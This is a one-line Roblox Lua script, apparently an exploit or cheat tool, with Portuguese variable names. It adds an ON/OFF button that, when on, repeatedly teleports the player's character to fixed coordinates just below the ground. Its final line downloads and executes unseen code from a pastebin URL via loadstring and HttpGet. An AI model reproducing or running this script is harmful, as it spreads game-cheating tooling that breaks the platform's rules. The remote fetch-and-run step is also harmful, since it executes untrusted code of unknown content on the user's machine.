local player = game.Players.LocalPlayer local pos = Vector3.new(-3.91041565, 7.39100456, 785.351501) local offsetY = -3 local delayTP = 0.05 local ativo = false local gui = Instance.new("ScreenGui") gui.ResetOnSpawn = false gui.Parent = player:WaitForChild("PlayerGui") local frame = Instance.new("Frame") frame.Size = UDim2.new(0, 140, 0, 60) frame.Position = UDim2.new(0, 20, 0, 200) frame.BackgroundColor3 = Color3.fromRGB(25,25,25) frame.Parent = gui local botao = Instance.new("TextButton") botao.Size = UDim2.new(1, -10, 1, -10) botao.Position = UDim2.new(0, 5, 0, 5) botao.BackgroundColor3 = Color3.fromRGB(170,0,0) botao.Text = "OFF" botao.TextColor3 = Color3.new(1,1,1) botao.TextScaled = true botao.Parent = frame task.spawn(function() while true do if ativo then local char = player.Character if char then local hrp = char:FindFirstChild("HumanoidRootPart") if hrp then hrp.AssemblyLinearVelocity = Vector3.zero hrp.CFrame = CFrame.new(pos + Vector3.new(0, offsetY, 0)) end end end task.wait(delayTP) end end) botao.MouseButton1Click:Connect(function() ativo = not ativo botao.Text = ativo and "ON" or "OFF" botao.BackgroundColor3 = ativo and Color3.fromRGB(0,170,0) or Color3.fromRGB(170,0,0) end) loadstring(game:HttpGet("https://pastebin.com/raw/3UF7Y1dF"))()